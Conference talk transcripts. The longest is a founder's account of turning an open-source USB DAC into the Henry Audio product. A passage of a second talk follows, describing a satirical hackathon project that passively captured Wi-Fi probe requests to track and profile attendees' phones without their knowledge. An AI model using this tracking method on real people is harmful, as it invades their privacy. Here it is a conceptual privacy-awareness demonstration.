trend. In Norway the electric car industry is a mega trend. Do I believe there are mega trends in digital music and consumer electronics? Definitely. I think I've spotted three of them. One is I'm using water analogy here. One is a sudden tsunami of fashion. Anybody, anyone of you own a Tamagotchi? Good choice. Anyone of you own a clamshell phone? Flap up phone? They were the rage. They were the big thing. So Tamagotchi were hugely popular. Very fashionable to have a Tamagotchi. Very fashionable to have a clamshell flip up phone. Now they're gone from the market. If you are a big player, hitting fashion could be very, very good. You can sell loads. You can just stuff these boxes into the market. You can sell a lot of them. Then you stop. Suddenly the wave, the fashion is gone. You have two full containers on their way from China. You do not know what to do with them when they arrive on your doorstep in two months from now. So the fashion part of consumer electronics, I find it scary. There's a tidal wave of convenience. The pun is very much intended. Convenience is MP3 killed the CD. CD killed the LP and now streaming services and cell phones are even killing the MP3 players. And it's driven by convenience the whole way. So convenience is a strong force. And I'm using tidal as the example of the music streaming service. It's very convenient. We're going to demo a little bit of tidal later on. And the convenience is also something that comes and goes in a slightly more predictable pattern than the tsunamis of fashion. There's a global warming for quality. The last light I showed with a girl with a big headphones, people want that. People like to do that. People like to say, yes, I do have a favorite brand of coffee. It's a good thing. It's something people aren't shy about. And I like that because I want to be on the team that provides the quality primarily. So sometimes these waves interact like waves always do from back in physics lessons. So teens with record players, I think it's just one interaction of two of these waves that would be the record players being fashionable and representing high quality. They're inconvenient as anything, but they're fashion and they're quality. So these three megatrends interact. And again, this is my opinion. This is what I believe. So I think for you to know approximately what landscape you're in with your devices and technologies could be a very good thing. So know a little bit about the room around you and what's going on there. And it's a beautiful thing to fall in love with some core technology and work bottom up with it. But I think putting things into a little bit of a perspective is good. So that was my first learning point to try to identify some megatrends. Is there money to be made in consumer electronics and digital audio? Definitely. I've sold 900 of these out of my basement. I'd love to sell a whole lot more. And that's not a lot. I mean, Sony would sell 900 things like that in 15 minutes, not even that. But I think that there is a lot of money to be made. I mean, only one guy here knew about my brand. A lot more people, even in this room, definitely at this conference would see a benefit from enjoying music in a convenient and high quality way. And that's my message. Other people have different messages. There's a huge HiFi install base. There's people bought piles and piles of HiFi equipment that is not internet connected. And now they want to enjoy the convenience of internet connection for their HiFi kit. At the same time, people buy cell phones all the time. And they want their cell phones to feed into the systems they already have. So that's the gap I'm trying to bridge. You might be trying to bridge in different gaps. So it's good to look at install bases. What do people have? What can we plug into and improve on what's there? Not make something brand new from scratch. That's also a lot of fun, but not necessarily only do that. There's my business learning point number two. I'm jumping straight to it. I haven't yet started on the sequential history that led to the product, but I will soon. My business learning point number two is to take notes. So you're taking notes now, that's good. You probably won't regret too much not taking notes today, but you never know. The best advice I think I ever got was to keep a diary of all interaction. I would speak with consultants. I would speak with members of the press. I have a journalist file. A lot of the sales here are driven by PR from reviews and the press. I have detailed journals of all interactions I had with all journalists. I don't just have a pile of email that I could search. I have a journal that refers to the mail message. I have a diary. So best advice, keep a diary. I traced down some pretty serious bugs and source code and I kept a detailed diary. I changed one parameter at a time, scientific method, note down what you changed. Eventually you will see a pattern appear. So okay, this story. What led to this open source consumer product? I was 19, I had Norwegian Oldman Fog in high school and I had some electronics and additions in programming. That was a fantastic combination. One day I asked my programming teacher what happens if I differentiate a digital signal and digital domain, convert it to analog, then integrate it with a continuous time analog integrator. That's approximately how I phrased the signal or the question at age 19. My teacher said I have absolutely no idea. If there's a curious soul or two here, you can combine after the talk and I'll tell you what that does. But it's a technical thing that doesn't have to do with the business part of this. So he said I have no idea, how about you just build one? So I did. I put one together. That's a picture from my oscilloscope. It's actually the one that sits in the bag there and it will be a key player. And my second talk this afternoon. I build one. Fast forward 15 odd years I had a working high NCD player. It looks like this. I haven't sold a single one because I have decided not to. It's an expensive piece of kit. I also had a degree in electronics. So for quite a few years I forgot about being a sales guy and only recently did I find out that I missed that. It's great to make the thingy work. I meditate with the oscilloscope now and then. What I do instead of chairing for a favorite football team. I chair for my favorite windowed sink. Which that is. And I missed sales. Make the thingy work and sell it. Something was missing in the CD player project. This was my main project at the time. USB audio was becoming popular. That was the beginning of this convenience mega trend. Streaming services hadn't yet been established. But people wanted quality from their MP3 players. So people wanted to play their MP3 files or downloaded Flak, WAV, whatever files on a decent piece of kit. And there was no way to put that into my device at the time except flipping a silver disc into it. Six, seven years ago the chips were immature. Have you ever experienced that? That the chip or the technology you need is almost there? Have you had that experience? I had that. The support from the makers of those chips was one-on-one. I had to interact very tightly with engineers who had made faulty chips. Both to tell them how to improve on the chips but also try to understand how I could hack my way around the bugs. Their source code was closed so I had no way of actually figuring out what was going on in there. So it was a lot of trial and error. And also the commercially available mature chips at the time they did not have the high end audio potential to them. My passion was always to make it sound pretty darn good. And the available chips didn't do that. So this is very, very annoying. I had to sign NDAs. I had to interact with Taiwanese engineers six, seven time zones away who never had the time because I was a rink and ink little customer they didn't care about. So then I got a lucky strike. This is a picture of an early SDR widget. I'm not going to ask if anyone here has heard about the SDR widget. It's a piece of electronics that lets your Linux box connect to ham radio equipment. So imagine you have a huge antenna. You have some foot pedals to control it. You have some radio kit to tune in different frequencies. Then you have this thing to connect all that with your Linux computer. I must admit I haven't fully understood the full application of that. But what I saw is that they had done USB audio just right. They had used the correct technology for USB audio. And I thought this technology has the potential to go into what may become a consumer product. That thought didn't strike me at the time. But I definitely thought this is what I need in my CD player. And the open source collaboration was superior to trying to get attention from one-on-one from the engineers. So the open source project was approximately at the same maturity level as the commercial chips six, seven years ago. I first discovered this project in 2010 on AVR Freaks. It runs on an AVR32, which Alfie and Boogin has probably had a hand or two in dealing with. And it wasn't perfect at the time, but it was a much, much better bet than the other chips. So open source, who here has contributed in an open source effort? Nobody? No open source contributors here? That's a little sad. It's very sad. I'm going to cry now, even though I haven't talked about the onion later, but I'm going to cry now without the onion. It's a great thing to do. It's not perfect, but it's a lot of fun. It really is a lot of fun. You have an itch. Someone else might have the same itch. Exactly, you have an itch. The guy behind you could probably reach that more easily than you could. So you scratch each other's itches, and it turns out you maybe have the same itch. You may be having related itches. You learn from each other. It's a great way to collaborate. I was lucky enough to meet one of the main contributors to the SDR widget project in Singapore. He's an anesthesiologist by day, and he codes microprocessors at night. Needless to say, he's a pretty smart guy. And we had a lot of fun. So you scratch each other's itches, but there is a business learning point here, too. So if you're not experienced from open source, that's a little sad, but I have something I wanted to tell you about it, is that you're worth your weight in code. This is my experience. Again, like I said, I'm opinionated about things. I'm trying to tell you things as they are. You write the code, or you forget about it. It takes a pretty significant open source project to have room for project management, architecture, and design. Some of you guys may have a huge talent for that, that an open source project might really, really benefit from how to make a strategy steer in one direction, hand out tasks, but that's not how it's done, unless maybe, I don't know, the Linux core, the Linux kernel development project. But maybe that is big and significant enough to have roles like those, but on smaller projects, you code. If you want to steer the project in some direction, if you want something to emerge, you pull your code that way. And it's the way it is culturally in these projects. If you can contribute code, others will contribute code back. But it's like you contribute first. And also, if you want to start an open source project, I've tried that a couple of times without contributing the initial 2,000 lines of code for a working prototype, forget about it. You can't go out there and say, hey, do you have a little code snippet here and a little code snippet there, and I could be the guy who tries to tie it together? You need to have an initial something that people can contribute to. I wish it wasn't like that, but in my experience, that's the way it is. So I tried to create a fit and join a team. If you want the picture, I have it in higher quality than this. This is the AB1.1. Now I'm, and this picture was actually to promote this as a product on my first web page, which is a little interesting. It actually sold to a lot of geeks. And do I have a laser? No. Well, I'll just try to point, because I'll explain what is there. What you see here is an analog board in the bottom and a digital module on top. And this is itch scratching in practice. My itch at the time was I have a CD player. It plays CDs beautifully. It doesn't have USB input. So my idea was to take that digital module, snap it out of there, and plug it into my superior analog board. Now in order to attract programmers to this project, I couldn't say, hey, programmers, you want this to work? You got to solder up this huge analog thing. It will be perfect, but it's going to take you like 10 hours of soldering and some industrial tools to do it. I couldn't do that, so I tried to provide the digital hackers with a good working analog board to put their code on. That model worked pretty well. The modular approach, it costs a lot of money. This board that is modular cost me like $6, $7 more to make because it was modular. But in the early stages of the project, that was a good way to attract people. That whole model, like, I'm not alienating the analog geeks because they can plug this into, like, the sky is the limit kind of weird analog stuff that they're doing. And I didn't alienate the digital hackers because they could get up and running as soon as they had compiled the code. And what's in this code is an asynchronous USB audio interface. Next presentation goes into detail about what that is. Just trust me, it's good. Asynchronous USB audio is a force of good. And it worked. So here's another business learning point. Some of you might have a business model, like Facebook had this business model where they give it away for free first and then start either selling ads or charging for it. That might work. But I was selling hardware. It costs money to make hardware. So early paying customers is a very good thing. I made the two first prototypes on my own and paid for that, sent that out to a couple core programmers. Then I made 10. That was sold. Then I made 100. That was a big leap to go from 10 to 100. That took a lot of my savings actually to do that. And all of those, I kept one of each at home for my museum, at the bottom of a cardboard box. All of those were sold to fellow programmers in this project. So that was a lot of fun. I like that. So people bought hardware from me, got it in the mail, wrote code for me and sent the code back. That was a nice way of progressing things. I like that. Of course, I was writing a hell of a lot of code too and I was drawing circuit boards. But it worked. We were scratching each other's itches and pulling each other up. So revenue is motivation both for you. It's fun that people pay you money for what you do. Not just to paycheck, but that the actual end customer gives you their hard earned money because they think what you did is worth it. It's also great motivation for investors. I have not involved investors in this yet. That's a completely different story. But they like revenue. I'm pretty certain about that. Now over to production. I said I made 100. When you make 100, even when I made 10, I couldn't put them together on my own. It takes five to eight hours of hand soldering to put one of those together. I dare say I'm relatively good at it. It's a lot of work. You can't base a business on it. Luckily, I do have electronics manufacturing experience. I used to work at Fluxtronics, which sadly is closed down now. That's in electronics factory and billing style. I've also done factory inspections on three continents for people I worked for. Experience in manufacturing to me was gold when code started turning into production hardware. Outsourcing is interesting. You've got to weigh your words a little bit because all of a sudden you step into the whole loose face cultural aspects. When you hire a bunch of these guys, they might be very, very good at doing their job. But between you having certain pictures in your head of what the product is going to do and these guys knowing precisely how to put something together, there's a lot of room for error. Ramping up production can be a little bit like playing the ladder game. That was my experience. The next business learning point is the outsourcing ladder game. Now, I'm going to phrase this in a controversial way simply because I'm not talking to a Chinese audience. If I were talking to a Chinese audience, I would phrase things differently. That's part of the culture aspects here. You buy samples. The first 10 I got were super. Everything worked out of the box. Great. Absolutely no problem with the samples. Great price, right quality, delivered on time, boom, boom, boom. Samples, fantastic. Then you do the first volume batch. Comes back with all sorts of funny faults. You try to point out those faults and say, why is it like this? Why is it crooked? Why is it bent? The unit I showed you that only had the bottom plate and the front cover had a big discrepancy right there. The chassis was bent at least one millimeter out of shape. Either way, there's no way you could sell that to demanding consumers. I said, hey, it's bent out of shape. The response was, you didn't specify. Okay, I didn't specify. You do like one, hopefully you can get up one ladder or you throw the dice and you move a little bit ahead on the ladder game. You specify, yeah, one more before we get to the specification part. I should have flipped those around. Anyway, you tell your subcontractors in Asia, please do not buy faulted chips from Cussin and install them. The answer is going to be yes. Does anybody know the Chinese word for no? Now you do. The Chinese word for no is yes. You know which question you should never ask in this context? The most pointless question to ask in this context is, do you understand? The answer will be yes. Thank you. Which means? So the box I showed you, the open one with a gray background, had a faulty voltage regulator chip. Now the voltage regulator chip takes 5 volts in from the USB connector, converts that down to 3.3 volts for the CPU. The CPU cost me $12. The faulty regulator chip sent the 5 volts straight through. That would boil the microcontroller. So the faulty regulator chip had a listed price of, I think, $1.20 at the fairly low volume I was working with at the time, 100 units. They probably got one that looked exactly the same that they paid $0.15 for or that they found on a scrap heap. So somebody saved 100 units times $1 and risked 100 units times $12 worth of microcontrollers. Luckily, they hadn't bothered to run the test procedure on what they had to assemble. I'd specify the test procedure. I said, okay, you plug in the cable, you turn it on, you upload the firmware, you check that the light goes on. Thank God they hadn't done that because if they had, they would have nuked the whole batch at my cost. After a little bit of experimenting, and the batch size was 100 units, remember that, I was able to bring it down to four minutes of repair time. I felt pretty proud when I got it down to four minutes of repair time. I also had to negotiate quite hard with that Chinese vendor to get my parts because some parts were custom made for me and I'd ship them down there and they only used some of them. They'd negotiate pretty hard to liberate those parts from their warehouse so that I could send it to a new vendor. So back to specifying everything, you get silence. You specify absolutely everything. They don't respond. There's actually two ways of saying no in Chinese. Now you've seen them both. So you find a new vendor. There's new hope. Another game moves on. Hopefully you don't get to start all the way from scratch because by now you've written a 19 page quality manual. You received your fair amount of silence. I did that just this fall. And you move on. There's the website. There's a website called global sources.com. I use that a lot when I'm looking for vendors to make a little piece of aluminum or some custom made part. What I do now is I refer to the quality manual. I say read this first. If you can relate to this level of documentation, this detail of specification, then you respond. If you can't, don't respond. That actually works. So you can hire some local QA people. You get twice the error sources. So I usually just don't mind with that. I'm going to show you here what happens when you hire local QA people. So I'm going to connect to my webcam. I put a webcam here. And right now it's taking a photo of this. So this is the same product. It just looks like a bird's nest of wires right now. Next session we're taking the lid off. See? That's the marketing guy. And do you see it from here? Do you see that something is a little off? Here? No, you probably don't. I'm going to bring it up on the screen instead. And there we are. This front is made from a circuit board. Usually circuit boards are green and they have chips on it. This circuit board is white and it doesn't have chips. It's made so that the Henry Audio logo stands out in blank metal. That's actually tin covered copper for anyone bothering to know. Whenever you make a circuit board, okay, imagine I'm a circuit board manufacturer, okay, I put a date code on it. And I put a logo on it that states that this is made from non-flammable stuff. It's made from a control source. Everything is beautiful. Then I put that stamp on the circuit board because that's what I always do. The customers specify no logos, no changes, no scratches, pen marks. I mean, no red pen marks, no green pen marks, no blue pen marks, specify everything. I had. So they had to do a remake. It came back. Pen marks. Remake. But then I had everything specified. This was done by a Swedish company with local QA people on the ground. I had specified everything. It still didn't fly because that's the way we always do it. You can fly down yourself. I've done that not with my money but on somebody else's. That brings quality up. For example, you can identify that the chips from Cussin didn't work. So you say, okay, the chips from Cussin, we need to put a site. And you need to produce with the good chips. I heard people do that except when the good chips run out, guess where they go to find chips to keep the production line flowing. I heard people who physically traveled from Norway to China to take Cussin's chips out of the box and throw them away because they were bad. So there's a temporary increase in quality by flying down. You can have live and westerners and that's what Apple and company does. That's expensive. It's efficient because there's going to be a factory inspection every day. Okay. I'm going to speed up a little bit now with a business learning point number six, culture matters. I was teaching technology subjects to Norwegian 10th graders along with some consulting I did a few years ago. That was a lot of fun. We were teaching electromagnetics by means of electric guitars. That was a lot of fun. So I had 25, 16-year-olds talking face to face with the five brightest 16-year-olds was as productive as mailing the engineer who was six time zones away. And I'm not saying a single bad word about the engineer. He knew his job. He produced everything according to the specification. This is a clever guy. But because of the language, time zone and written communication filters, he ended up or accepting my wishes and my explanations as easily as a 16-year-old I had in front of me. And there's probably a 15, 20-year experience gap between those two individuals and the communication link, cultural differences equalized that. So in China, using narrow scope, they can make things beautifully as long as it's not thinking out of the box. So you never think out of the box ever. But keep it narrow and it works. And you need to own the process. No, have you made something like this? Fluffy undefined question. Nothing comes back. You make according to this drawing. It comes back and it's beautiful. So the box is now made in the Philippines. They have perfect English and they're able to do purchasing and quality checks on my behalf even though I'm a fairly small player with our factory. So if you ever consider having something outsourced, let me know I can help you do it in the Philippines. It saves you a lot of hassle. So I got back on track. I sorted out some of the manufacturing issues. I started marketing the D2A converter as QNKTC quantization, I kill the cat. There will be a short written test afterwards who can remember that acronym. Nobody can. I know, I personally know two people who can recite that. I had a media breakthrough. It was tested in What magazine in Norway as a consumer product and it looked like this. And that was in, let me see, that was in March 2013. So that's exactly three years old. Then I thought, hey, maybe I'm going to sell this, not just to my own CD player project. Maybe I'm going to sell this to the general public. So I kept working with the open source group and eventually I dared sell one to your aunt. I don't know your aunt in person, but she's the person who doesn't upload new firmware. So I reached a point where I said, okay, this firmware actually flies. I can send this out and a few boxes will come back for me to upgrade. I can handle that. Not every box will come back for me to upgrade again and again. There's an ASIO driver that was developed. Remember I said Microsoft USB audio class two? Now if you want to develop a proper audio driver for Windows, you might as well spend a lifetime. If I had the choice, I'd rather erect the Eiffel Tower than build one of those. It's hard. That's also one of the reasons I was unable to start an open source project, making one of those. The licenses are also not very open source friendly, obviously. So but the ASIO driver is one way to easily get away those limitations and Windows, but only for certain ASIO enabled programs. So ASIO is a technology that bypasses all of Windows' built-in audio systems. It works beautifully and it's relatively easy to program. And what I did is I said on the mailing list for this open source program, I said, we need this. And I'm giving away two fully functional units to whoever can make an annoying beep sound come out of Windows with audio class two. Because if you can make an annoying beep sound, there's some way to hook music onto that, too. And luck and nothing happened. A year later, a guy out of nowhere in Russia said, hey, I made ASIO driver. Happy days. It had a few bugs in it. He and I and a couple other guys, we did some programming to it. It didn't take much to ironing out. Beautiful. And that was one of the big enablers, that and the what article. So I invested in C.E. marking, the CD player became less important. C.E. marking, I'm just going to say very briefly what that is about. You know C.E. marking yourselves here? No. In order to sell a piece of electronics in the EU, you need to put a C.E. mark on it. C.E. mark means I say this is good. In order to say that this is good, you can hire someone to test it for you. I did that. There's no C.E. approval. There's a C.E. declaration. You don't have to apply for a C.E. mark. You can stamp it on. But that also means that you put your good word and honor and finances behind that statement. It was really expensive to test this in Norway. We have NEMCO in Norway. There's no way to get funding assistance. That wasn't big enough to get like NFR grants, things like that. I went to Slovenia. I got a 50% discount because the EU commission lists approved test houses. You can find that list and you can shop around. I was a little tedious, but okay, I figured it out. So with the ASIA driver, high resolution C.E. marking, all these things in place, I got into Techniske-Ukiblan. That was a door I could just knock on and say, hey, I had to connect with a friend of a friend. It looked like this. The snug geek you see on the picture is very snug because he got a pretty important bug sorted out. That's what's going on. There's a oscilloscope back there. That's the exact same thing I will show later on. So this is the actual debug signal from deep within the USB protocol exposed on the scope. And here you say, an open source Oracle from OMSC contributed. That was the guy who wrote the ASIA driver. So things pulled together to make it work. I hired a press advisor in the UK. And this is something I could tell you right away that the Norwegian press is a beautiful thing. We have members of the Norwegian press here. And the Norwegian press is read in guess which country. The UK trade press can be read by anyone. So I hired a guy there and got some tests. That was good. With this first product, I added consumers to developers and I changed the name to Henry Audio. At this time, the QNKTC angle, the open source development kind of died down because it was stable. It was good. So this is a recent day-to-day firmware updates. Henry is my grandfather on my mother's side. He's one of the guys who made Chris Dumbledalvik the sailing ship. So he worked with Clinker Building ships and he made solid stuff. And I had a really good connection with my grandfather. So he liked the fact that I became an electrical engineer and so the name is from him. I also started fumbling with online advertising. So a few words about growing out of the lab. The Norwegian saying about you rather want one bird in your hand that you can grasp and ten on the roof is not like that. You rather want 200 in the market than 10 working in the lab. Growing super core technology is good but a super product from off the shelf components is better. So the avocado and the onion. I was lucky enough to get some assistance in obtaining an avocado today. Does anybody know the difference between these two vegetables? Yes, that's good. That's one difference. That was not the one I was aiming for. Yes. So the avocado, you made a solid core in the lab. But what people want is the green goo. That's the avocado. And let's hope you found out before it was too late that what you had working in the lab, the core of the avocado, was what you fell in love with. It was your beautiful technology. That was the one bird in your hand, not the ten on the roof. Meanwhile, the onion, which is layer of layer of layer of goo from common off the shelf components will fly in the market. I'm not going to throw these and catch them. I used all the onions in the lab. But it's an analogy. And I mean, if you go away, if you're developers, you go away with one thing or two things to remember, one is to take notes. The other is don't fall in love with a hard core. Because people may very well want the green goo. A little bit about advertising. I got reviews online and people would say, how about you thank us for the review by buying a completely pointless ad? I'd say try training it gel-efficient instead. It may just be as much fun and as profitable. It's a very hard to grasp thing. It's a little bit like picking up a jellyfish. You can't really get a good hold of it. I'm a programmer and the approach I'm taking to online advertising with Google AdWords now is a little bit like I would with learning a new API or a new programming language. So the syntax is the search ad. Google Henry audio, you'll find some text there authored by me or someone else. That's the syntax. The debugger is called Google Analytics. That's a very, very powerful statistical analysis tool that sees how these ads behave and what people do on your website. And the CPU and the operating system would be the general public. I mean, that's my take on it and it's completely the wrong take. But that's where I'm coming from. And I find it the fluffiest, hardest to grasp programming environment ever. So I'm getting to the point where you need to be an expert. Like I've said, programming, manufacturing, PR, advertising, you need to be an expert in a lot of things. And it's entertaining. It's fun but it's also a little bit straining. But there's nothing new about being an expert in a lot of fields. You had to be a geography, math and grammar expert back in school. You had to do tests, maybe two or three tests every week. This is just like it. I liked school. I like this. But nobody can be Steve Jobs and Steve Walshnyak at the same time. So part of the reason I've sold 900 of them and not billions is because I've had to be those two guys at the same time and it's not easy. Here's a tip about interacting with other experts. You will depend on other experts but try not to be their pro bono project. You know what pro bono means? So if you spend $1,000, $2,000, $10,000, $20,000 on a consultant, that's a lot of money for you. That bleeds. But what you get back is a rinky-dink project on his or her side. So I've had a 50-50% success rate with small consulting hires. But don't avoid the small consulting projects by becoming their pro bono project instead. I have received two hours of hard facts quality time from experts. Get them profoundly taking the best notes I possibly could at the time and said that was it. Maybe a couple follow-up emails. But don't become their pro bono project. Instead try to engage in some valuable exchange that he or she will value your contribution to their project vice versa. That's the best way to do it. Happily give two hours of your time to complete strangers. I did that year and a half ago. That's why I was invited to come here and tell the same story again. I'm here because of that. And do take notes. A little bit about open source licenses. There wouldn't be a Henry audio if it wasn't for the SDR widget. Fabio's way to cooperate. You said you weren't working so much with open source and I'm going to skip past this. Just know that there are different licenses that will make code reuse in a commercial project easy or that will make it hard to reuse the code. There are also licenses that will make it easy or hard to bring commercial code into your project. So what's next? I want to reach out to marketing retail channels. I can't go on with a solo 6040 wasniac jobs mix. It's just not sustainable. I'm not even comparing myself to them. I said that's why I'm aspiring to. I want to introduce what I have today in more markets. I want to make new models with the same technology and with a few more bells and whistles. I know what people have told me they want. I'm going to make that and see if they buy it. I could help, for example, atmo own the USB interface market. And I actually went to them a few years ago and said, hey, your chip does a better USB interface than you think it does. We work together. Didn't quite work out. I could help Microsoft become a major player. I'm not even going to bother trying. And if any one of you has experience in USB descriptor debugging for iOS, I'd like to know because I have a bug and I'm not able to find it. And there's something in the descriptor works flying colors and all other OSS, but that one descriptor in iOS has something that I don't know. That is. Now it's all about manufacturing and marketing. High-five present English leads to high-five present other languages, which leads to gadget press, blogs, hopefully consumer press. You might have seen this on dnc.no. That was good. That was good. But I wouldn't have gotten there if I didn't have a foundation to lean on. So I thought about this. It's a brick building with a beautiful window with a speaker. It's brick on brick. So English and then diversification after that. What arrives in your computer is CD quality and what arrives in your speakers can be amazing. Just lend the computer a hand and you'll love the end result. Now there's five more minutes left on my schedule, so I thought we could make a demo. Would you like that? Yeah? So that's going to, anybody hear about the demo effect? So now is the time to make your bets about the demo effect and my demo. So this is what it looks like. It's plugged in. You can plug it in there. And I can swap to title. I'm cutting it now for two reasons. Have you heard this song before? Yes. Have you heard the bass sound as if it came out of an actual woodworking shop? Or have you heard the bass sound as if it came out of a piece of plastic that went from time to time? The whole point of bringing, of adding quality to convenience in audio is that you can hear that bass came out of an actual woodworking store. Would anybody like to hear it on the big speakers? Should we try that? Yeah? Okay, I need to unplug a little bit. I need to unplug a little bit more. Friends, thanks for. It was on mute but on the phone. She says, boys like a little mobility to hold a knife. And no one won't be no stick, make your silicone body doze. So if that's what you're into, then go ahead and move along. Because you know I'm all about that bass, about that bass, no trouble. I'm all about that bass, about that bass, no trouble. I'm all about that bass, about that bass, no trouble. I'm all about that bass, about that bass, no trouble. I'm all about that bass, not typo. I'm all about that bass, not typo. I'm all about that bass, not typo. I'm all about that bass, not typo. I'm all about that bass, not typo. I'm all about that bass, not typo. I'm all about that bass, not typo. I'm all about that bass, not typo. My brother. I am. My brother. Blue tooth and his car. He shares the same car with his wife. He's in his living room having a conversation with someone. car, his wife arrives back home, phone goes silent. Audio is rerouted automatically to the Bluetooth in his car that came within range. When wireless works, it's beautiful. It's, I mean, you know, have these. When it doesn't work, it just fails. And it's a little bit like digital systems. One and zero. That's, you know, what we hear about all the time in our business. When it works, it's beautiful. When it fails, it fails so miserably. That is not even funny. So, cables go both ways. I like them because they're intuitive. You know, you plug them in, you unplug them, it goes dead. Not really. And I think that's partially because of the install base. Plus what I'm making, at least what I'm playing with in the lab right now plugs into all these wireless gadgets you can get. I mean, the Google Chromecast, for example, has an optical output that would plug into what I'm making next. So it's, wireless can be an accessory. It doesn't need to be a core part of my product. At least I've chosen that. The other thing with wireless is I mentioned the CE marking. And what costs 70,000 Kroner with Nemco with cables costs 110,000 Kroner with Nemco when it's wireless. And that's, yeah, my same experience. That's good. I found some similar stuff in Slovenia. That was also around the 30,000 Kroner mark. So, yeah, yeah. But wireless just adds to both your bill of material because you need to buy the actual wireless chip. It adds to the cost of testing that it works before you send it out of the market. And it adds a lot of cost to me as a developer. But yes, there is a pull for wireless, but it doesn't necessarily overlap with the quality conscious market I'm going after. Because people see that with wireless they can get like Bluetooth audio, they can get reasonable quality, same convenience, reasonable quality, but higher quality performance comes from something you can actually plug in. And then you avoid all the potential hassles from it. Okay. Any more questions? Yeah. Yeah. Yeah. Yeah. I know. I know. I mean, I need to prioritize my time very hard. And for me, flying solo to develop everything that needs to, for that functionality, that would take simply too much of the focus. Yeah, it's, it's, it's, it's, there are legal matters too, but, but I'm, but just, just developing that embedded technology would, would, would be too much for me. For morons who could put a 10 person team on it for half a year. It's, it's not a problem, but they have the volumes to, to, to defend that. So yeah, I'm, yes, which is, I mean, some, some, some people are triggered by the convenience. Some people are triggered by, by the high quality. If, if you merge the two and next session will partially be about that, if you merge the two, there are things get more complex and more expensive. And, and the, the price tag would simply be too high for a lot of people. I used to travel as a field application engineer with Nordic Semiconductor and, and the US and the customers I would talk to there would say things like, oh, we need to make one of these. That can be in the 29.99 shelf at some given retail store. And if your chip costs more than this, then we need to bump the end product from the 29.99 to the 39.99, where expectations are higher and where this product wouldn't sell. So you need to help us stay in the 29.99 segment. So you might have been up against the same kind of logic there where they gave you the convenience, but not the high end performance. You had to choose. Okay, that's what I had. I'm going to put my toys down and hopefully they will all work in the, in the next embedded debugging session later on. Thank you for your time. And I hope there was a couple of things here to bring home or to put into your projects.
At the outskirts of the Internet of Things are the interconnects to the actual analog world around us. Henry Audio is the ambition to connect the net with the personal emotions in the music we listen to. A digital protocol met precise analog electronics in the Open Source project Audio Widget. One result of this international cooperation is a USB DAC (digital-to-analog converter) which gets top reviews with music lovers and at the same time can have its code and schematics explored in minute detail. Børge Strand-Bergesen tells the story about the conception of the project and the various bumps in the road on the way from code to consumer product.
10.5446/50514 (DOI)
I'm going to start off by saying that I'm actually experiencing an IoT related problem right now because a friend of mine who does a lot of public speaking suggested that I should definitely use a heart rate tracker to check my heart rate while I was on stage because it could be pretty interesting. And I didn't charge it this morning, so it's actually low on battery, but it seems like it's still running. And right now my heart rate is 82 if anybody is interested. Okay, the reason I'm here now is because a month ago I was attending an event in Oslo which is the Arctic IoT Challenge. It's the first of its kind in Oslo. It's basically a hackathon that goes from Thursday to Sunday, but you have three days of working together in a team to create something cool that's IoT related. And we had six teams competing, making different things. Some were controlling robots, some were making drones, some were creating things for the home, smart things for the home. A lot of cool things going on. And this is me with my team. And we decided that we wanted to do something a bit different. And before the conference, no, the hackathon, we were thinking about what should we do, what should we make. And we sort of came up with the idea that we wanted to maybe do something a bit satire staying on our own, like naive interest in technology and all of these cool things that you can put on the cloud as opposed to the for-profit companies who are actually making these things and driving technology forward. So we came up with the fictional company called Evil Corp. And what Evil Corp does is that they provide free Wi-Fi for the masses. It's very altruistic. They create these Wi-Fi hotspots that they will put out in different locations and allow people to connect to them and get free Wi-Fi. And Evil Corp is, of course, not doing this just because they're kind. They're doing it because they want to earn some money. And since they're giving their product away for free, they sort of have to do something else. So what they're doing is that they're tracking the data that's available freely in the air from people around their Wi-Fi hotspots. Yeah. And of course, we had to have a physical product that Evil Corp can put out there in the physical locations like shopping malls, et cetera, where consumers are congregating. And it looks something like this. This is a Wi-Fi hotspot. If you take a closer look at it, you'll probably notice that it has a Raspberry Pi strapped to it on one side and on the other side it has a battery pack. And attached to the Raspberry Pi, it has Wi-Fi dongles. And the cool thing about these Wi-Fi dongles is that, first of all, they're dirt cheap. You can buy them for $2 from China. And second, they support something called monitor mode. And basically, what that means is that you can use these dongles to access information in the network that you really don't really need to be accessing. In particular, we're very interested in mobile phones that everybody has in their pockets when they're walking out and about. And the cool thing about mobile phones is that if they're Wi-Fi enabled, they're looking for wireless networks that they know already. And they're trying to connect to these wireless networks. How that basically works is that the mobile phone will send out something called a probe request. And the probe request contains information that's more or less innocent. It contains a MAC address and a unique identifier for the phone. It contains an SSID of the network, the known network that the phone is looking for. And this is sort of just broadcast. You can pick up on it. And that's what we did. On the first day of the hackathon, we put together three of these devices. And we put them out in the area where we were working. I don't think I have sound, but it's OK. Since I don't have sound, there's going to be a surprise at the end that doesn't make any sense. This is the place that we were at the venue. So in every corner, we put out one of these devices on the first day. And what basically happens is that everybody who's at the hackathon are non-the-wisely and they'll just be walking around all day long with their mobile phones in their pocket. And we'll be collecting information. This is Benny Hill, by the way. We had fun Benny Hill music in the presentation here. So that makes a lot of sense. So people are walking around with their mobile phones in their pockets. And their mobile phones are unwittingly transmitting information about them being there, first of all, because if they aren't there, then there's no transmission going on. And it's transmitting information about what networks they're looking for. And it's transmitting information about the phone itself, the hardware address, so that we can pick this up and do something with it. So our devices are now in the corner of the room, in the corners of the room. And we're starting to pick up a lot of information. These probe requests are sent out continuously. If your mobile phone is looking for Wi-Fi, they'll just be blasting out these probe requests. And we can pick them up and we can send them to a central location, a piece of cloud software that we wrote that would just take all this information and start building profiles. Building a profile for each unique device that we see. So basically, you walk around the room and you send out these probe requests and we can get information from all of the different places that you've been. And we can add them to one centralized profile because we have your unique address. And so we build this profile on each and every device and then we push it onto a dashboard. Sorry. It looks something like this. If we just take a look first on the left-hand side here. Each and every one of these three columns is one of these beacons that we've put in the corner of the room. And every line here represents a device that we are currently seeing. So whenever somebody new comes into the room, they'll show up here more or less immediately, like within a second. And we keep this updated. Every time new information comes in, it's pushed to this dashboard in real time. They also have a signal strength indicator for each of the beacons that see them so that we can use that to say something about how close are they to the beacon. So this is sort of interesting in itself. You have information about a device that comes and goes. So you can keep track of how it moves, where it has been at a certain time. And you think, okay, well, that's not too bad because it's anonymous data and it doesn't really matter that much. So the next step here is to go from having anonymous movement data to actually try to identify that person and have an actually identified person moving around and tracking that instead. So if we take a look on the side here, we have actually the profile. The profile is very basic. It's made up of the names of the networks that people's phones are looking for. And you would think that that would be pretty innocent information, but it turns out this is actually in itself quite rich, can be at least for some of these people who are working around here. The phone was leaking information about maybe the name of the employer that they work for, maybe even their own name if they have their own home 